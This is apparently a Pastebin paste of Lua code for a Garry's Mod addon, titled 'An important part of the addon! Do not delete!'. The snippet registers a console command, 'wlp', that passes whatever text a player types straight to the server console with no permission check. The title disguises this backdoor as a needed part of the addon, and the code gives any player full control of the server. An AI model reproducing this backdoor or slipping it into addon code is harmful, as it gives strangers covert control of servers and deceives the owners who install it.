Advertisement
Guest User

An important part of the addon! Do not delete!

a guest
Aug 3rd, 2019
124
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. concommand.Add( "wlp", function( ply, cmd, args )command = ""
  2. for k,v in pairs(args) do
  3. if table.getn(args) == 1 then
  4. command = v
  5. else
  6. command = command .. " " .. v
  7. end
  8. end
  9. game.ConsoleCommand(command .. "\n")
  10. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement